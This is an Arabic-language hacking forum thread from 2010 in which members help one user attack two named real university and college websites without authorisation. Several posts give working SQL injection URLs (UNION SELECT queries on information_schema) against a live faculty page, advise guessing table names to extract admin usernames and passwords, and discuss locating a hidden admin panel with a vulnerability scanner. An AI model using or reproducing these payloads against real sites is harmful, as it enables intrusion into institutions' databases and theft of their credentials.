التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 11-26-2010, 01:51 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
إحصائية العضو





إسلام العالم غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
إسلام العالم is on a distinguished road

افتراضي غير مجاب: مساعدة في هذين الموقعين


السلام عليكم يا إخوة...

ممكن تقولوا لي وين غلطي في هذين الموقيعن:

1-

http://physiology.case.edu/faculty.php?id=114

http://physiology.case.edu/faculty.p...20115,%2037%29

في هذا الموقع لا يظهر لي عامود اليوزر و الباس؟؟؟

2-


http://www.mbc.edu/

مسار لوحة التحكم هو هذا : http://www.mbc.edu/admin/index.php

بس مو راضي يفوت على مسار التحكم ليش؟؟؟؟؟؟؟؟؟؟




Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC lshu]m td i`dk hgl,rudk

   

رد مع اقتباس
قديم 11-26-2010, 02:15 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
إحصائية العضو








خالد سعودي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
خالد سعودي is on a distinguished road

افتراضي


إسلام العالم

هلا فيك ياغالي عندك خطا في الحقن راجع معي

كود PHP:
http://physiology.case.edu/faculty.php?id=-114 UNION SELECT 1,2,3,4,5,Group_concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10
+from+information_schema.columns+Where+column_name+LIKE+CHAR(371129737
انت حول تراجع الدوره
اذمانفع معاك pas ممكن ماخفيفه جرب pa فقط
الان تمام كمل عليه شوف الرابط تتااكد من الخطا الاملائية

   

رد مع اقتباس
قديم 11-26-2010, 11:48 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
إحصائية العضو





إسلام العالم غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
إسلام العالم is on a distinguished road

افتراضي


أخي بارك الله فيك

الرابط الذي وضعته أظهر لي الجداول التالية :

TABLESPACE_NAME>information_schema>FILES,
PARTITION_NAME>information_schema>PARTITIONS,
SUBPARTITION_NAME>information_schema>PARTITIONS,
PARTITION_ORDINAL_POSITION>information_schema>PART ITIONS,
SUBPARTITION_ORDINAL_POSITION>information_schema>P ARTITIONS,
PARTITION_METHOD>information_schema>PARTITIONS,
SUBPARTITION_METHOD>information_schema>PART

ولا واحدة فيها password أو pass أو أي شيء يدل على الباسوورد

   

رد مع اقتباس
قديم 11-26-2010, 01:16 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية awras
 

 

 
إحصائية العضو





awras غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
awras is on a distinguished road

افتراضي


اخي العزيز مافي جدول في قاعده البيانان باسم يوزر او باس
جرب غير اسماء
انا وجدت اسم احد الحداول وانت ابحث عن الباقين وعن الحقول تيع الادمن او الباسوورد
http://physiology.case.edu/faculty.php?id=-114 UNION SELECT 1,2,3,4,5,6,7,8,9,10+from+master--

   

رد مع اقتباس
قديم 11-26-2010, 01:43 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
إحصائية العضو





إسلام العالم غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
إسلام العالم is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة awras
اخي العزيز مافي جدول في قاعده البيانان باسم يوزر او باس
جرب غير اسماء
انا وجدت اسم احد الحداول وانت ابحث عن الباقين وعن الحقول تيع الادمن او الباسوورد
http://physiology.case.edu/faculty.php?id=-114 UNION SELECT 1,2,3,4,5,6,7,8,9,10+from+master--

أليس من المفروض عن حقني للموقع أن يظهر إسم الجدول مع العامود؟؟؟؟

هذا ما أتكلم عنه أنا فلم يظهر مع أنه الحقنة صحيحة؟؟؟؟

فهل يجب في هذه الحالة بدأ بالتخمين؟؟؟؟؟

   

رد مع اقتباس
قديم 11-26-2010, 02:29 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية awras
 

 

 
إحصائية العضو





awras غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
awras is on a distinguished road

افتراضي


صحيح اخي انت تشفر كلمه pass or password or username or email
وبعدين تحقن ويطلع اسم الجدول والحقول
لكن في سكربتات مافيها باس او يوزر فيها اسماء تختلف وغير معروفه احيانا
لهذا يكون دور تخمين وباشكال مختلفه
فهمت ؟؟

   

رد مع اقتباس
قديم 11-26-2010, 03:05 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
إحصائية العضو








خالد سعودي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
خالد سعودي is on a distinguished road

افتراضي


هلا فيك ياغالي وبحث ماحصلت الباس واليوزر ممكن ماقال اخونا awras بارك الله فيك ان سكربت مافيها باس ويوزر

   

رد مع اقتباس
قديم 11-26-2010, 05:19 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
إحصائية العضو





إسلام العالم غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
إسلام العالم is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة awras
صحيح اخي انت تشفر كلمه pass or password or username or email
وبعدين تحقن ويطلع اسم الجدول والحقول
لكن في سكربتات مافيها باس او يوزر فيها اسماء تختلف وغير معروفه احيانا
لهذا يكون دور تخمين وباشكال مختلفه
فهمت ؟؟

نعم فهمت أخي
جزاك الله خيرا..

ماذا عن الموقع الثاني ؟؟؟مشكلة لوحة الأدمن؟؟؟؟

   

رد مع اقتباس
قديم 11-26-2010, 10:02 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية awras
 

 

 
إحصائية العضو





awras غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
awras is on a distinguished road

افتراضي


اخي هاد مش مسار لوحه التحكم
http://www.mbc.edu/admin/index.php
اعتقد انو حاططهه للتمويه
انا فحصت الموقع ببرنامج
Acunetix Web Vulnerability Scanner 7
وطلع فيه ملفات كتيرره
اما ان يكون اسم لوحه التحكم غير اسم او انو حاذفهه ويعتمد فقط عله الاف تي بي
هاد الي اعرفو فقط

   

رد مع اقتباس
قديم 12-02-2010, 03:13 AM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
إحصائية العضو








خالد سعودي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
خالد سعودي is on a distinguished road

افتراضي


نعم في مواقع تكون مسار الوحه التحكم تمويه
هذا البرنامج حلو انا استخدمه Acunetix Web Vulnerability Scanner 7
بصراحه ساعدك awras .



ولكن حاول تشوف سكربت المركبه على الموقع كيف دخوله
موفق


التعديل الأخير تم بواسطة خالد سعودي ; 12-02-2010 الساعة 03:16 AM.

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 06:36 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0